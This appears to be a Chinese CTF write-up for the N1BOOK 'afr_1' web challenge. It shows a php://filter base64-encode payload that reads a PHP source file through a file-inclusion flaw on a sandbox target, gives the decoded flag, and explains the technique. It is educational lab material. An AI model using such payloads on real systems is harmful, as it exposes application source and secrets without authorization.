Writeup 4 N1BOOK afr_1

Writeup 4 N1BOOK afr_1

题目信息

项目 内容
题目名称 afr-1
题目来源 N1BOOK-第一章Web入门-任意文件读取漏洞-afr_1 本题为Nu1L团队编著的《从0到1:CTFer成长之路》的配套题目。
来源网站 https://book.nu1l.com/
题目类型 Web
考点 PHP 文件包含漏洞 + php://filter 伪协议。
靶机 http://challenge-2add095438b79cd3.sandbox.ctfhub.com:10800
Flag n1book{afr_1_solved}

解题过程

第 1 步:使用 php://filter 绕过

访问:

http 复制代码
http://challenge-2add095438b79cd3.sandbox.ctfhub.com:10800/?p=php://filter/read=convert.base64-encode/resource=flag

页面返回:

base64 复制代码
PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9Cg==

第 2 步:Base64 解码

得到:

php 复制代码
<?php
die('no no no');
//n1book{afr_1_solved}

Flag 就藏在源码注释中:

text 复制代码
n1book{afr_1_solved}

核心知识点

这道题的关键是 php://filter 伪协议。

用途:

读取源码(最常用),不执行代码,只把文件内容读取出来。是任意文件读取题的首选。

php://filter 是 PHP 中用于对数据流进行过滤和转换的封装协议。

read=convert.base64-encode 表示在读取文件时先进行 Base64 编码;

resource= 指定目标文件路径。

这种方式不仅能绕过 die() 阻止直接输出内容的问题,还能防止特殊字符被浏览器或后端解析,是 CTF 中任意文件读取的经典手法。

为什么需要它:

直接 include('flag.php') 时,PHP 会执行该文件,flag 变量或 echo 的输出可能被条件限制(比如题目里的 die('no no no'))。用 filter 可以在文件被"打开"的瞬间进行编码转换,让 PHP 来不及执行,只把源码吐出来。

语法:

php 复制代码
php://filter/read=过滤器/resource=目标文件

CTF 最常用的写法:

http 复制代码
http://challenge-2add095438b79cd3.sandbox.ctfhub.com:10800?p=php://filter/read=convert.base64-encode/resource=flag

拿到 Base64 字符串后,解码即可看到源码。

其他可用过滤器:

  • string.rot13:ROT13 编码
  • convert.iconv.UTF8.UTF16:字符集转换,可用于绕过某些过滤
  • string.strip_tags:去除 HTML/PHP 标签

注意 :/resource= 必须放在最后,resource= 后面的文件名不需要转义。

Rambo

2026年10月07日

🎉🎉🎉

相关推荐
hengdonghui6 小时前
Writeup 4 N1BOOK 常见的搜集
ctf·信息搜集
hengdonghui1 天前
Writeup 4 N1BOOK SQL注入-1
ctf·sql注入·union·字符型注入
hengdonghui2 天前
Writeup 4 红帽杯 2021 WebsiteManger
web·ctf·ssrf·sql布尔盲注
hengdonghui4 天前
Writeup 4 2020 - 之江杯 - 异常的流量分析
wireshark·ctf·流量分析
hengdonghui4 天前
Writeup 4 津门杯 2021 Web hate_php
php·web·ctf·通配符
hengdonghui5 天前
Writeup 4 红帽杯 2021 Web Find_It
web·ctf·备份文件泄露
hengdonghui5 天前
Writeup 4 强网杯 2019 强网先锋打野
ctf·misc·zsteg
hengdonghui6 天前
Writeup 4 NUAA 2017 robots
android·ctf·re
hengdonghui6 天前
Writeup 4 CSS CTF Semester 2 2026 - Lamp Drill
ctf·re